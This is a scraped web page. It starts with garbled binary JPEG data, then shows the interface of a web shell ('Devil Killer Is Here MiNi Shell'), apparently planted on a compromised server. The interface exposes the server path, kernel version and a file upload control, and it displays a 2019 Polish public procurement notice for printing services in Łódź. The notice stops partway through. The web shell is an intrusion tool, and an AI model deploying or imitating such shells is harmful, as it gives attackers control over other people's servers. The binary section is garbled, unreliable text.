JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190410/535789-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 535789-N-2019 z dnia 2019-04-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">"EC1 Łódź-Miasto Kultury" w Łodzi</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Sukcesywne świadczenie usług poligraficznych wraz z dystrybucją niektórych pozycji asortymentowych oraz montażem banerów"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">"EC1 Łódź-Miasto Kultury" w Łodzi</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">10052223800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Targowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1/3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">90-022</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Łódź</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">42 233 50 53</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@ec1lodz.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">42 638 59 58</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ec1lodz.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytucja Kultury</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://ec1lodz.ezamawiajacy.pl/servlet/HomeServlet</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Poczta</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">,,EC1 Łódź - Miasto Kultury" w Łodzi, ul. Targowa 1/3, 90-022 Łódź, Sekretariat</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Sukcesywne świadczenie usług poligraficznych wraz z dystrybucją niektórych pozycji asortymentowych oraz montażem banerów"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">080/DA/PN/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest sukcesywne świadczenie usług poligraficznych wraz z dystrybucją niektórych pozycji asortymentowych oraz montażem banerów w podziale na następujące części/pakiety:1) PAKIET 1 - Usługi poligraficzne,2) PAKIET 2 - Usługi specjalistyczne poligraficzne,3) PAKIET 3 - Usługi w zakresie wydawnictw zwartych.Na realizację przedmiotu zamówienia składają się następujące etapy:1)	w PAKIECIE 1: a)	przygotowanie materiałów do druku (prepress),b)	usługi drukowania (press),c)	usługi introligatorskie (postpress),d)	opakowanie, ubezpieczenie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi,2)	w PAKIECIE 2:a)	usługi drukowania,b)	usługi montażu i demontażu lub opakowanie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi,3)	w PAKIECIE 3:a)	przygotowanie materiałów do druku (prepress),b)	usługi drukowania (press),c)	usługi introligatorskie (postpress),c)	opakowanie, ubezpieczenie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi, z zastrzeżeniem pkt IV.4. SIWZ.Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) dla każdej części/pakietu zawarty został w Formularzu asortymentowo-cenowym, stanowiącym Załącznik nr 3 do SIWZ.PRAWO OPCJI:Zamawiający przewiduje możliwość skorzystania z prawa opcji w zakresie świadczenia usług poligraficznych dotyczących następującego asortymentu określonego:a)	w PAKIECIE 1:- w poz. 4 (Wizytówki) w ilości 5 nakładów, - w poz. 21 (Plakat, format netto 500x707mm) w ilości 5 nakładów, - w poz. 25 (Folder, format netto 848x297mm) w ilości 1 nakładu, - w poz. 26 (Folder, format netto 848x297mm) w ilości 2 nakładów,b)	w PAKIECIE 2:- w poz. 5 (Naklejka, różne kształty) w ilości 1 nakładu,- w poz. 6 (Stand, format 2x2m) w ilości 3 nakładów,- w poz. 7 (Dibond srebrny, drapany) w ilości 1 nakładu,c)	w PAKIECIE 3:- w poz. 2 (Wydawnictwo zwarte: Sergei Eisenstein, wybór tekstów) w ilości 1 nakładu,- w poz. 3 (Wydawnictwo zwarte: Alfabetyzm filmowy) w ilości 1 nakładu,o parametrach takich samych jak wskazane w Załączniku nr 3 do SIWZ (Formularz asortymentowo-cenowy). Zamawiający, w ramach prawa opcji, może nabyć pełną ilość nakładu asortymentu lub tylko część. Szczegółowe warunki realizacji prawa opcji zostały uregulowane w ISTOTNYCH POSTANOWIENIACH UMOWY, stanowiących odpowiednio Załącznik nr 1a do SIWZ (dla PAKIETU 1), Załącznik nr 1b do SIWZ (dla PAKIETU 2) oraz Załącznik nr 1c do SIWZ (dla PAKIETU 3). Zamawiający zastrzega, iż może skorzystać z prawa opcji do końca obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest przekazać do bibliotek uprawnionych do otrzymywania bibliotecznych egzemplarzy obowiązkowych, zgodnie z ustawą o obowiązkowych egzemplarzach bibliotecznych, publikacje wskazane w PAKIECIE 3 w pozycjach od nr 1 do nr 5. Lista bibliotek oraz ilość obowiązkowych egzemplarzy znajduje się pod adresem:http://www.bn.org.pl/dla-wydawcow/egzemplarz-obowiazkowy/liczba-egzemplarzy-obowiazkowych/. Przesyłki zawierające egzemplarz obowiązkowy są zwolnione z opłat pocztowych.Wykonawca zobowiązany jest przekazać egzemplarze obowiązkowe w następujących terminach:Bibliotece Narodowej - w ciągu 5 dni od zakończenia procesu produkcji publikacji;pozostałym bibliotekom - w ciągu 14 dni od zakończenia procesu produkcji publikacji.PODSTAWA PRAWNAo	Ustawa z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (t.jedn.: Dz.U. 2018, poz. 545),o	Rozporządzenie Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad ich przekazywania (Dz.U. 1997, nr 29, poz. 161, ze zm.).RÓWNOWAŻNOŚĆ:Wobec wszelkich wskazanych i wymaganych w SIWZ norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencyjnych oraz certyfikatów, Zamawiający dopuszcza rozwiązania równoważne. Podane przez Zamawiającego nazwy, znaki towarowe mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu. Zamawiający dopuszcza składanie ofert równoważnych. Za ,,produkt równoważny", Zamawiający będzie uznawał produkt o nie gorszych parametrach technicznych, niż wskazane w opisie przedmiotu zamówienia.ZATRUDNIENIE NA PODSTAWIE UMOWY O PRACĘ:Zamawiający, mając na uwadze treść art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie umowy o pracę - w rozumieniu przepisów art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.jedn.: Dz.U. z 2018 r., poz. 917 ze zm.), osób wykonujących następujące czynności w zakresie realizacji zamówienia:1)	w PAKIECIE 1 i PAKIECIE 3:a)	usługi CTP,b)	usługi drukarskie,c)	usługi introligatorskie;2)	w PAKIECIE 2:a)	usługi drukarskieprzez okres obowiązywania umowy z Wykonawcą.Zasady dokumentowania zatrudnienia przez Wykonawcę osób na umowę o pracę oraz kontroli wykonania przedmiotowego obowiązku i sankcji z tytułu ich nieprzestrzegania, zostały określone w § 4 i § 7 Istotnych postanowień umowy (dla każdego z pakietów), stanowiących Załącznik nr 1a, 1b oraz 1c do SIWZ.GWARANCJA:Wykonawca zobowiązany będzie udzielić gwarancji jakości i rękojmi za wady na okres:1)	minimum 24 miesięcy na wykonane i dostarczone materiały informacyjno-promocyjne w zakresie PAKIETU 1,2)	minimum 24 miesięcy na wykonane i dostarczone materiały wielkoformatowe w zakresie PAKIETU 2,3)	minimum 24 miesięcy na wykonane i dostarczone wydawnictwa zwarte w zakresie PAKIETU 3.Okres gwarancji liczy się od daty podpisania właściwego protokołu zdawczo-odbiorczego. ISTOTNE POSTANOWIENIA UMOWY Szczegółowe warunki realizacji zamówienia określają: ,,ISTOTNE POSTANOWIENIA UMOWY" stanowiące odpowiednio Załącznik nr 1a do SIWZ (dla PAKIETU 1), Załącznik nr 1b do SIWZ (dla PAKIETU 2) oraz Załącznik nr 1c do SIWZ (dla PAKIETU 3).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">79823000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie stawia warunku w tym zakresie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON 